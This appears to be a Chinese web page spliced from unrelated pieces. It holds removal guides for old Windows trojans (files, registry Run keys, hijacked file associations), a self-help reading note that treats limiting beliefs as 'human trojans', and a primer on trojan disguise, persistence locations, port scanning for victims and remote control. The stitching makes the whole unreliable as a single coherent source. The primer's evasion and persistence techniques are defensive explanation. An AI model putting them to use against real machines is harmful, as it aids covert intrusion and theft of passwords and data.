哈哈,木马就是如此,骗你没商量!聪明基因是文件关联木马,服务端运行后会生成三个文件,分别是:C:\WINDOWS\MBBManager.exe和Explore32.exe以及C:\WINDOWS\system\editor.exe,这三个文件用的都是HTM文件图标,如果不注意,还真会以为它们是HTM文件呢! Explore32.exe用来和HLP文件关联,MBBManager.exe用来在启动时加载运行,editor.exe用来和TXT文件关联,如果你发现并删除了MBBManager.exe,并不会真正清除了它。一旦你打开HLP文件或文本文件,Explore32.exe和editor.exe就被激活!它再次生成守护进程MBBManager.exe!想清除我?没那么容易! 聪明基因最可怕之处是其永久隐藏远程主机驱动器的功能,如果控制端选择了这个功能,那么受控端可就惨了,想找回驱动器?嘿嘿,没那么容易! 清除 *** : 1.删除文件。删除C:\WINDOWS下的MBBManager.exe和Explore32.exe,再删除C:\WINDOWS\system下的editor.exe文件。如果服务端已经运行,那么就得用进程管理软件终止MBBManager.exe这个进程,然后在windows下将它删除。也可到纯DOS下删除MBBManager.exe,editor.exe在windows下可直接删除。 2.删除自启动文件。展开注册表到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run下,删除键值“MainBroad BackManager”,其值为C:\WINDOWS\MBBManager.exe,它每次在开机时就被加载运行,因此删之别手软! 3.恢复TXT文件关联。聪明基因将注册表HKEY_CLASSES_ROOT\txtfile\shell\open\command下的默认键值由C:\WINDOWS\NOTEPAD.EXE %1改为C:\WINDOWS\system\editor.exe %1,因此要恢复成原值。同理,到注册表的HKEY_LOCAL_MACHINE\Software\CLASSES\txtfile\shell\open\command下,将此时的默认键值由C:\WINDOWS\system\editor.exe %1改为C:\WINDOWS\NOTEPAD.EXE %1,这样就将TXT文件关联恢复过来了。 4.恢复HLP文件关联。聪明基因将注册表HKEY_CLASSES_ROOT\hlpfile\shell\open\command下的默认键值改为C:\WINDOWS\explore32.exe %1,因此要恢复成原值:C:\WINDOWS\WINHLP32.EXE %1。同理,到注册表的HKEY_LOCAL_MACHINE\Software\CLASSES\hlpfile\shell\open\command下,将此时的默认键值由C:\WINDOWS\explore32.exe %1改为C:\WINDOWS\WINHLP32.EXE %1,这样就将HLP文件关联恢复过来了。 好了,可以和聪明基因说“再见”了! 七、黑洞2001 黑洞2001是国产木马程序,默认连接端口2001。黑洞的可怕之处在于它有强大的杀进程功能!也就是说控制端可以随意终止被控端的某个进程,如果这个进程是天网之类的防火墙,那么你的保护就全无了,黑客可以由此而长驱直入,在你的系统中肆意纵横。 黑洞2001服务端被执行后,会在C:\windows\system下生成两个文件,一个是S_Server.exe,S_Server.exe的是服务端的直接复制,用的是文件夹的图标,一定要小心哦,这是个可执行文件,可不是文件夹哦;另一个是windows.exe,文件大小为255,488字节,用的是未定义类型的图标。黑洞2001是典型的文件关联木马,windows.exe文件在机器开机时立刻运行,并打开默认端口2001,S_Server.exe文件用来和TXT文件打开方式连起来(即关联)!当中木马者发现自己中了木马而在DOS下把windows.exe文件删除后,服务端就暂时被关闭,即木马暂时删除,当任何文本文件被运行时,隐蔽的S_Server.exe木马文件就又被击活了,于是它再次生成windows.exe文件,即木马又被中入! 清除 *** : 1)将HKEY_CLASSES_ROOT\txtfile\shell\open\command下的默认键值由S_SERVER.EXE %1改为C:\WINDOWS\NOTEPAD.EXE %1。 2)将HKEY_LOCAL_MACHINE\Software\CLASSES\txtfile\shell\open\command下的默认键值由S_SERVER.EXE %1改为C:\WINDOWS\NOTEPAD.EXE %1。 3)将HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ RunServices\下的串值windows删除。 4)将HKEY_CLASSES_ROOT和HKEY_LOCAL_MACHINE\Software\CLASSES下的Winvxd主键删除。 5)到C:\WINDOWS\SYSTEM下,删除windows.exe和S_Server.exe这两个木马文件。要注意的是如果已经中了黑洞2001,那么windows.exe这个文件在windows环境下是无法直接删除的,这时我们可以在DOS方式下将它删除,或者用进程管理软件终止windows.exe这个进程,然后再将它删除。 至此就安全的清除黑洞2001了。 八、Netspy( *** 精灵) Netspy又名 *** 精灵,是国产木马,最新版本为3.0,默认连接端口为7306。在该版本中新添加了注册表编辑功能和浏览器监控功能,客户端现在可以不用NetMonitor,通过IE或Navigate就可以进行远程监控了!其强大之处丝毫不逊色于冰河和BO2000!服务端程序被执行后,会在C:\Windows\system目录下生成netspy.exe文件。同时在注册表HKEY_LOCAL_MACHINE\software\microsoft\windows\CurrentVersion\Run\下建立键值C:\windows\system\netspy.exe,用于在系统启动时自动加载运行。 清除 *** : 1、重新启动机器并在出现Staring windows提示时,按F5键进入命令行状态。在C:\windows\system\目录下输入以下命令:del netspy.exe 回车! 2、进入注册表HKEY_LOCAL_MACHINE\Software\microsoft\windows\CurrentVersion\ Run\,删除Netspy的键值即可安全清除Netspy。 九、SubSeven SubSeven的功能比起大名鼎鼎的BO2K可以说有过之而无不及。最新版为2.2(默认连接端口27374),服务端只有54.5k!很容易被捆绑到其它软件而不被发现!最新版的金山毒霸等杀毒软件查不到它。服务器端程序server.exe,客户端程序subseven.exe。SubSeven服务端被执行后,变化多端,每次启动的进程名都会发生变化,因此查之很难。 清除 *** : 1、打开注册表Regedit,点击至:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run和RunService下,如果有加载文件,就删除右边的项目:加载器="C:\windows\system\***"。注:加载器和文件名是随意改变的。 2、打开win.ini文件,检查“run=”后有没有加上某个可执行文件名,如有则删除之。 3、打开system.ini文件,检查“shell=explorer.exe”后有没有跟某个文件,如有将它删除。 4、重新启动Windows,删除相对应的木马程序,一般在C:\windows\system下,在我在本机上做实验时发现该文件名为vqpbk.exe。
人类木马程序的特征
今日第二天阅读李欣频的《人类木马程序》,第二章“人类木马程序的特征”。一边看,一边思考,里面有很多新鲜词汇,我觉得好的都摘抄下来,以及有一些自己的思考。
这个章节主要叙述了人类木马程序的六大特征,在我仔细拜读的过程中,也在慢慢扫描自己身上的木马,进而察觉,通过扫毒软件清除自带木马。那么接下来我讲述一下哪六大特征。
之一个特征:让人误以为是真的,以为是不可改变的真理、真相。
绝大部分的木马程序都是被所谓的“正面信念”包裹着,因为我们从小到大的教育是要往正向走,所以 对于表面看似正向的讯息没有警觉 ,木马程序通常不会被我们的防御系统挡在外面,这就是为什么正面思考很多时候反而变成了锁住自己的木马程序。
作者用名言“吃得苦中苦,方为人上人”举例说明其中暗藏的木马程序模组。“吃得苦中苦”暗藏着不自信之择苦模组;“方为人上人”暗藏着怕落后模组。
我是一个矛盾的人,时而自信时而自卑。如果是我一直重复练习,比较熟练的领域,我确实可以表现出来自信,毕竟是自己能够掌控的事情。但是对于没有接触过的比如舞台,我就会自卑,我想着自己的普通,穿着普通,气质普通,个子也不高,你看,我在写这些的时候,这些不自信模组就在无意识中进入了我的大脑。
我又不想努力,不想去学习穿搭,因为要花钱,于是我就想着我这辈子就这样了吧,只能一直在自己的小圈子里蹦跶,在自己的舒适圈里自信一会,因为出了舒适圈我就会开始自卑,觉得自己不够好。
当我看到别人参加了什么线下课程,看到别人又通过什么方式变现了,又get到了什么新技能,又有什么开心的事情,这些都会让产生怕落后的木马程序。
我知道我要觉察自己的这些木马程序,然后 通过学习,通过接纳的方式清除这些木马程序。
第二个特征:让人只选择看到、听到与这组木马程序相符合的概念,不符合此概念的,既看不到,也听不到,可称之为“不注意视盲、耳聋”。
在爱情里、婚姻里,误会可以让人冲昏头脑。有一对夫妻,突然有一段时间,老公经常夜不归宿,按照老公的说法是天天在公司加班(估且是真的)。老婆觉得不放心,有一天晚上在老公公司楼下等他,看到老公出来还挺高兴的,觉得真的在加班。让人没想到是老公居然和自己的闺蜜一起出来,然后闺蜜还上了他的车。这个故事接下来的结局,大家可以想象,妻子很可能大闹一场,认为老公是不是在外偷情,这个时候妻子的大脑已经被植入了怀疑模组,只相信自己看到的、听到的,完全不想听丈夫的解释。
第三个特征:有竞争与评比标准,让人变得有压力,感觉能量萎缩、不开心、扭曲本貌、自责自己不够好,以为未来可以有一个“更好的自己”。所以当事人会抓着木马程序不放,也不愿改变,因为他以为这是可以激励让自己更好、不断前进向上的信念。
当你带着“觉得自己不够好”的焦虑频率时,木马就会进入你心城中的洞缺,创造出各种让你花钱、花时间、花生命的开始。我们经常会看到整容上瘾的新闻,整完鼻子,整嘴唇,各种整,最后损害了自己的健康;觉得自己不够好,想通过学习来改善自己,于是只能去付费,认为付费了自己就可以学到很多,但最后发现什么也没有学到,更焦虑了。因为各种上课让自己负债累累,内心还沾沾自喜觉得自己付出了好多,很努力,却不知已中焦虑、觉得自己不被爱的木马程序模组。
我每年都去考试,但是每年都因为时间,因为自己内心不够强大而考不过。于是总想着去哪报个班,报完线上班,报线下班,想着花钱了我就会更加努力,肯定就可以考过了。最后发现越报课越焦虑,越焦虑越考不过,原来我中木马程序多年却不知道,看了这本书,才知道,我们要自己主动去觉察木马程序,然后将阻碍成长的木马程序清除。
人和人比气死人,当我们一旦把自己和别人比,焦虑木马程序马上植入,我们的行为举止又将引来自毁模组,这一系列的“鬼打墙”让我们真的像旋转木马一样,一直在原地打圈圈,无法往前前进。
第四个特征:想要达到的目标与内在潜藏的木马程序冲突却不自知,就像一支箭无法同时射向两个靶心,内在所欲与外在行为来回拉扯的“矛盾性”,导致梦想永远不会聚焦成真。
人一旦中了木马程序,内心真正想要的,与木马程序内建的方向会形成相违的状态,而当事人浑然不知。学习了演讲后,发现人性真是这样,很多人都是这样矛盾的活着。明明我们每个人的内心都非常渴望舞台,但是你要真有机会上台,你就发憱、害怕、胡思乱想,
我有一个朋友一直备孕未果,她和先生检查身体都没有任何问题。我问她:“如果现在有了孩子,你最害怕什么?”她不假思索的说:“我害怕失去自由,害怕房贷,害怕没有工作,害怕没有钱。”你看当你问自己这些问题的时候,你就知道了问题所在,内心想要的和木马程序内建反向不一致,这些问题就是搜出卡在你和愿望之间的木马程序的强力扫毒软件。
愿望不在未来或者远方,而应该转向聆听内在真正渴求的声音。当我们有愿望时,问自己:我真正的动机是什么?我到底想要什么?我能把自己调整成已完成的频率状态吗?
第 五个特征:木马程序被内建成功后,当事人会无意识、不经思考地直接反应、说话、动作、行为,而越来越偏离自己真正想要的。而且中了一个主要模组之后,会导致自己的关系 *** ,包括家庭关系、伴侣关系、人际关系、工作事业、财富资源、身体健康……全方位都一起联动出问题。
只要是对未到的未来预设“负向频率”,都是木马程序。一旦木马程序内建完毕,往往会使当事人形成“快速且自动化无意识”的处理方式。除非当事人觉察并中止,否则就会以木马程序所发射的频率为聚焦目标,来建构接下来的实相---我们的习惯就是我们自身推定的结果。
第六个特征:让人从这组木马程序,开始启动一连串“追逐虚幻不实目标”的过程,无穷无尽直到 *** 或筋疲力尽为止,这会浪费非常多的生命时间,甚至严重到自弃自毁。
在你觉察到自己或者别人又是重复“鬼打墙”般的话语与行为时,请先用“是爱还是恐惧”来做初步筛选。
比如我想去参加一个训练营的复训,这大概是第三次复训吧,我是出于内心真正想学习,是为了好玩,为了自己开心,还是为了让自己不落后别人。这是初步筛选,我是因为焦虑而上的这个课,那么我是带着焦虑的频率去的。
看到这里,终于懂了一点李欣频每次在直播的时候说的调频是什么意思了。当潜意识和无意识层保持一致,我们就没有木马程序。初步筛选没有成功,还可以进行深度快筛法,如果不去上这个课,行吗?如果不上这个课就会感到焦虑不安,这就算是中了木马程序,因为在内心过度依赖这个课带来的开心学习。
在清除木马程序之前,所有“努力向前”都是在强大你的木马,直到你被耗尽能量,完全锁死。
什么是木马程序
木马特洛伊木马(以下简称木马),英文叫做“Trojan house”,其名称取自希腊神话的特洛伊木马记。
它是一种基于远程控制的黑客工具,具有隐蔽性和非授权性的特点。
所谓隐蔽性是指木马的设计者为了防止木马被发现,会采用多种手段隐藏木马,这样服务端即使发现感染了木马,由于不能确定其具 *** 置,往往只能望“马”兴叹。
所谓非授权性是指一旦控制端与服务端连接后,控制端将享有服务端的大部分操作权限,包括修改文件,修改注册表,控制鼠标,键盘等等,而这些权力并不是服务端赋予的,而是通过木马程序窃取的。
从木马的发展来看,基本上可以分为两个阶段。
最初 *** 还处于以UNIX平台为主的时期,木马就产生了,当时的木马程序的功能相对简单,往往是将一段程序嵌入到系统文件中,用跳转指令来执行一些木马的功能,在这个时期木马的设计者和使用者大都是些技术人员,必须具备相当的 *** 和编程知识。
而后随着WINDOWS平台的日益普及,一些基于图形操作的木马程序出现了,用户界面的改善,使使用者不用懂太多的专业知识就可以熟练的操作木马,相对的木马入侵事件也频繁出现,而且由于这个时期木马的功能已日趋完善,因此对服务端的破坏也更大了。
所以所木马发展到今天,已经无所不用其极,一旦被木马控制,你的电脑将毫无秘密可言。
鉴于木马的巨大危害性,我们将分原理篇,防御与反击篇,资料篇三部分来详细介绍木马,希望大家对特洛伊木马这种攻击手段有一个透彻的了解。
原 理 篇
基础知识
在介绍木马的原理之前有一些木马构成的基础知识我们要事先加以说明,因为下面有很多地方会提到这些内容。
一个完整的木马系统由硬件部分,软件部分和具体连接部分组成。
(1)硬件部分:建立木马连接所必须的硬件实体。 控制端:对服务端进行远程控制的一方。 服务端:被控制端远程控制的一方。 INTERNET:控制端对服务端进行远程控制,数据传输的 *** 载体。
(2)软件部分:实现远程控制所必须的软件程序。 控制端程序:控制端用以远程控制服务端的程序。 木马程序:潜入服务端内部,获取其操作权限的程序。 木马配置程序:设置木马程序的端口号,触发条件,木马名称等,使其在服务端藏得更隐蔽的程序。
(3)具体连接部分:通过INTERNET在服务端和控制端之间建立一条木马通道所必须的元素。 控制端IP,服务端IP:即控制端,服务端的 *** 地址,也是木马进行数据传输的目的地。 控制端端口,木马端口:即控制端,服务端的数据入口,通过这个入口,数据可直达控制端程序或木马 程序。
木马原理
用木马这种黑客工具进行 *** 入侵,从过程上看大致可分为六步(具体可见下图),下面我们就按这六步来详细阐述木马的攻击原理。
一.配置木马
一般来说一个设计成熟的木马都有木马配置程序,从具体的配置内容看,主要是为了实现以下两方 面功能:
(1)木马伪装:木马配置程序为了在服务端尽可能的好的隐藏木马,会采用多种伪装手段,如修改图标 ,捆绑文件,定制端口,自我销毁等,我们将在“传播木马”这一节中详细介绍。
(2)信息反馈:木马配置程序将就信息反馈的方式或地址进行设置,如设置信息反馈的邮件地址,IRC号 ,ICO号等等,具体的我们将在“信息反馈”这一节中详细介绍。
二.传播木马
(1)传播方式:
木马的传播方式主要有两种:一种是通过E-MAIL,控制端将木马程序以附件的形式夹在邮件中发送出 去, 收信人只要打开附件系统就会感染木马;另一种是软件下载,一些非正规的网站以提供软件下载为 名义, 将木马捆绑在软件安装程序上,下载后,只要一运行这些程序,木马就会自动安装。
(2)伪装方式:
鉴于木马的危害性,很多人对木马知识还是有一定了解的,这对木马的传播起了一定的抑 *** 用,这 是木马设计者所不愿见到的,因此他们开发了多种功能来伪装木马,以达到降低用户警觉,欺骗用户的目 的。
(一)修改图标
当你在E-MAIL的附件中看到这个图标时,是否会认为这是个文本文件呢?但是我不得不告 诉你,这也有可能是个木马程序,现在 已经有木马可以将木马服务端程序的图标改成HTML,TXT, ZIP等各种文件的图标,这有相当大的迷 惑性,但是目前提供这种功能的木马还不多见,并且这种 伪装也不是无懈可击的,所以不必整天提 心吊胆,疑神疑鬼的。
(二)捆绑文件
这种伪装手段是将木马捆绑到一个安装程序上,当安装程序运行时,木马在用户毫无察觉的 情况下 ,偷偷的进入了系统。至于被捆绑的文件一般是可执行文件(即EXE,COM一类的文件)。
(三)出错显示
有一定木马知识的人都知道,如果打开一个文件,没有任何反应,这很可能就是个木马程序, 木马的 设计者也意识到了这个缺陷,所以已经有木马提供了一个叫做出错显示的功能。当服务 端用户打开木 马程序时,会弹出一个如下图所示的错误提示框(这当然是假的),错误内容可自由 定义,大多会定制成 一些诸如“文件已破坏,无法打开的!”之类的信息,当服务端用户信以 为真时,木马却悄悄侵入了 系统。
(四)定制端口
很多老式的木马端口都是固定的,这给判断是否感染了木马带来了方便,只要查一下特定的 端口就 知道感染了什么木马,所以现在很多新式的木马都加入了定制端口的功能,控制端用户可 以在1024---65535之间任选一个端口作为木马端口(一般不选1024以下的端口),这样就给判断 所感染木马类型带 来了麻烦。
(五)自我销毁
这项功能是为了弥补木马的一个缺陷。我们知道当服务端用户打开含有木马的文件后,木马 会将自己拷贝到WINDOWS的系统文件夹中(C:WINDOWS或C:WINDOWSSYSTEM目录下),一般来说 原木马文件 和系统文件夹中的木马文件的大小是一样的(捆绑文件的木马除外),那么中了木马 的朋友只要在近来 收到的信件和下载的软件中找到原木马文件,然后根据原木马的大小去系统 文件夹找相同大小的文件, 判断一下哪个是木马就行了。而木马的自我销毁功能是指安装完木 马后,原木马文件将自动销毁,这 样服务端用户就很难找到木马的来源,在没有查杀木马的工 具帮助下,就很难删除木马了。
(六)木马更名
安装到系统文件夹中的木马的文件名一般是固定的,那么只要根据一些查杀木马的文章,按 图索骥在系统文件夹查找特定的文件,就可以断定中了什么木马。所以现在有很多木马都允许控 制端用户自由定制安装后的木马文件名,这样很难判断所感染的木马类型了。
三.运行木马
服务端用户运行木马或捆绑木马的程序后,木马就会自动进行安装。首先将自身拷贝到WINDOWS的 系统文件夹中(C:WINDOWS或C:WINDOWSSYSTEM目录下),然后在注册表,启动组,非启动组中设置好木马 的触发条件 ,这样木马的安装就完成了。安装后就可以启动木马了,具体过程见下图:
(1)由触发条件激活木马
触发条件是指启动木马的条件,大致出现在下面八个地方:
1.注册表:打开HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersion下的五个以Run 和RunServices主键,在其中寻找可能是启动木马的键值。
2.WIN.INI:C:WINDOWS目录下有一个配置文件win.ini,用文本方式打开,在[windows]字段中有启动 命令 load=和run=,在一般情况下是空白的,如果有启动程序,可能是木马。 3.SYSTEM.INI:C:WINDOWS目录下有个配置文件system.ini,用文本方式打开,在[386Enh],[mic], [drivers32]中有命令行,在其中寻找木马的启动命令。
4.Autoexec.bat和Config.sys:在C盘根目录下的这两个文件也可以启动木马。但这种加载方式一般都 需要控制端用户与服务端建立连接后,将已添加木马启动命令的同名 文件上传 到服务端覆盖这两个文件才行。
5.*.INI:即应用程序的启动配置文件,控制端利用这些文件能启动程序的特点,将 *** 好的带有木马 启动命令的同名文件上传到服务端覆盖这同名文件,这样就可以达到启动木马的目的了。
6.注册表:打开HKEY_CLASSES_ROOT文件类型\shellopencommand主键,查看其键值。举个例子,国产 木马“冰河”就是修改HKEY_CLASSES_ROOT xtfileshellopencommand下的键值,将“C :WINDOWS NOTEPAD.EXE %1”该为“C:WINDOWSSYSTEMSYXXXPLR.EXE %1”,这时你双 击一个TXT文件 后,原本应用NOTEPAD打开文件的,现在却变成启动木马程序了。还要说明 的是不光是TXT文件 ,通过修改HTML,EXE,ZIP等文件的启动命令的键值都可以启动木马 ,不同之处只在于“文件类型”这个主键的差别,TXT是txtfile,ZIP是WINZIP,大家可以 试着去找一下。
7.捆绑文件:实现这种触发条件首先要控制端和服务端已通过木马建立连接,然后控制端用户用工具 软件将木马文件和某一应用程序捆绑在一起,然后上传到服务端覆盖原文件,这样即使 木马被删 除了,只要运行捆绑了木马的应用程序,木马又会被安装上去了。
8.启动菜单:在“开始---程序---启动”选项下也可能有木马的触发条件。
(2)木马运行过程
木马被激活后,进入内存,并开启事先定义的木马端口,准备与控制端建立连接。这时服务端用 户可以在MS-DOS方式下,键入NETSTAT -AN查看端口状态,一般个人电脑在脱机状态下是不会有端口 开放的,如果有端口开放,你就要注意是否感染木马了。下面是电脑感染木马后,用NETSTAT命令查 看端口的两个实例:
其中①是服务端与控制端建立连接时的显示状态,②是服务端与控制端还未建立连接时的显示状态。
在上网过程中要下载软件,发送信件,网上聊天等必然打开一些端口,下面是一些常用的端口:
(1)1---1024之间的端口:这些端口叫保留端口,是专给一些对外通讯的程序用的,如FTP使用21, *** TP使用25,POP3使用110等。只有很少木马会用保留端口作为木马端口 的。
(2)1025以上的连续端口:在上网浏览网站时,浏览器会打开多个连续的端口下载文字,图片到本地 硬盘上,这些端口都是1025以上的连续端口。
(3)4000端口:这是OICQ的通讯端口。
(4)6667端口:这是IRC的通讯端口。 除上述的端口基本可以排除在外,如发现还有其它端口打开,尤其是数值比较大的端口,那就要怀疑 是否感染了木马,当然如果木马有定制端口的功能,那任何端口都有可能是木马端口。
四.信息泄露:
一般来说,设计成熟的木马都有一个信息反馈机制。所谓信息反馈机制是指木马成功安装后会收集 一些服务端的软硬件信息,并通过E-MAIL,IRC或ICO的方式告知控制端用户。下图是一个典型的信息反 馈邮件。
从这封邮件中我们可以知道服务端的一些软硬件信息,包括使用的操作系统,系统目录,硬盘分区况, 系统口令等,在这些信息中,最重要的是服务端IP,因为只有得到这个参数,控制端才能与服务端建立 连接,具体的连接 *** 我们会在下一节中讲解。
五.建立连接:
这一节我们讲解一下木马连接是怎样建立的 。一个木马连接的建立首先必须满足两个条件:一是 服务端已安装了木马程序;二是控制端,服务端都要在线 。在此基础上控制端可以通过木马端口与服 务端建立连接。为了便于说明我们采用图示的形式来讲解。
如上图所示A机为控制端,B机为服务端,对于A机来说要与B机建立连接必须知道B机的木马端口和IP地 址,由于木马端口是A机事先设定的,为已知项,所以最重要的是如何获得B机的IP地址。获得B机的IP 地址的 *** 主要有两种:信息反馈和IP扫描。对于前一种已在上一节中已经介绍过了,不再赘述,我们 重点来介绍IP扫描,因为B机装有木马程序,所以它的木马端口7626是处于开放状态的,所以现在A机只 要扫描IP地址段中7626端口开放的主机就行了,例如图中B机的IP地址是202.102.47.56,当A机扫描到 这个IP时发现它的7626端口是开放的,那么这个IP就会被添加到列表中,这时A机就可以通过木马的控 制端程序向B机发出连接信号,B机中的木马程序收到信号后立即作出响应,当A机收到响应的信号后, 开启一个随即端口1031与B机的木马端口7626建立连接,到这时一个木马连接才算真正建立。值得一提 的要扫描整个IP地址段显然费时费力,一般来说控制端都是先通过信息反馈获得服务端的IP地址,由于 拨号上网的IP是动态的,即用户每次上网的IP都是不同的,但是这个IP是在一定范围内变动的,如图中 B机的IP是202.102.47.56,那么B机上网IP的变动范围是在202.102.000.000---202.102.255.255,所以 每次控制端只要搜索这个IP地址段就可以找到B机了。
六.远程控制:
木马连接建立后,控制端端口和木马端口之间将会出现一条通道,见下图
控制端上的控制端程序可藉这条通道与服务端上的木马程序取得联系,并通过木马程序对服务端进行远 程控制。下面我们就介绍一下控制端具体能享有哪些控制权限,这远比你想象的要大。
(1)窃取密码:一切以明文的形式,*形式或缓存在CACHE中的密码都能被木马侦测到,此外很多木马还 提供有击键记录功能,它将会记录服务端每次敲击键盘的动作,所以一旦有木马入侵, 密码将很容易被窃取。
(2)文件操作:控制端可藉由远程控制对服务端上的文件进行删除,新建,修改,上传,下载,运行,更改属 性等一系列操作,基本涵盖了WINDOWS平台上所有的文件操作功能。
(3)修改注册表:控制端可任意修改服务端注册表,包括删除,新建或修改主键,子键,键值。有了这 项功能控制端就可以禁止服务端软驱,光驱的使用,锁住服务端的注册表,将服务端 上木马的触发条件设置得更隐蔽的一系列高级操作。
(4)系统操作:这项内容包括重启或关闭服务端操作系统,断开服务端 *** 连接,控制服务端的鼠标, 键盘,监视服务端桌面操作,查看服务端进程等,控制端甚至可以随时给服务端发送信 息,想象一下,当服务端的桌面上突然跳出一段话,不吓人一跳才怪
木马和病毒都是一种人为的程序,都属于电脑病毒,为什么木马要单独提出来说内?大家都知道以前的电脑病毒的作用,其实完全就是为了搞破坏,破坏电脑里的资料数据,除了破坏之外其它无非就是有些病毒制造者为了达到某些目的而进行的威慑和敲诈勒索的作用,或为了炫耀自己的技术. "木马"不一样,木马的作用是 *** 裸的偷偷监视别人和盗窃别人密码,数据等,如盗窃管理员密码-子网密码搞破坏,或者好玩,偷窃上网密码用于它用,游戏帐号,股票帐号,甚至网上银行帐户等.达到偷窥别人隐私和得到经济利益的目的.所以木马的作用比早期的电脑病毒更加有用.更能够直接达到使用者的目的!导致许多别有用心的程序开发者大量的编写这类带有偷窃和监视别人电脑的侵入性程序,这就是目前网上大量木马泛滥成灾的原因.鉴于木马的这些巨大危害性和它与早期病毒的作用性质不一样,所以木马虽然属于病毒中的一类,但是要单独的从病毒类型中间剥离出来.独立的称之为"木马"程序.
一般来说一种杀毒软件程序,它的木马专杀程序能够查杀某某木马的话,那么它自己的普通杀毒程序也当然能够杀掉这种木马,因为在木马泛滥的今天,为木马单独设计一个专门的木马查杀工具,那是能提高该杀毒软件的产品档次的,对其声誉也大大的有益,实际上一般的普通杀毒软件里都包含了对木马的查杀功能.如果现在大家说某某杀毒软件没有木马专杀的程序,那这家杀毒软件厂商自己也好象有点过意不去,即使它的普通杀毒软件里当然的有杀除木马的功能.
还有一点就是,把查杀木马程序单独剥离出来,可以提高查杀效率,现在很多杀毒软件里的木马专杀程序只对木马进行查杀,不去检查普通病毒库里的病毒代码,也就是说当用户运行木马专杀程序的时候,程序只调用木马代码库里的数据,而不调用病毒代码库里的数据,大大提高木马查杀速度.我们知道查杀普通病毒的速度是比较慢的,因为现在有太多太多的病毒.每个文件要经过几万条木马代码的检验,然后再加上已知的差不多有近10万个病毒代码的检验,那速度岂不是很慢了.省去普通病毒代码检验,是不是就提高了效率,提高了速度内? 也就是说现在好多杀毒软件自带的木马专杀程序只查杀木马而一般不去查杀病毒,但是它自身的普通病毒查杀程序既查杀病毒又查杀木马!
0条大神的评论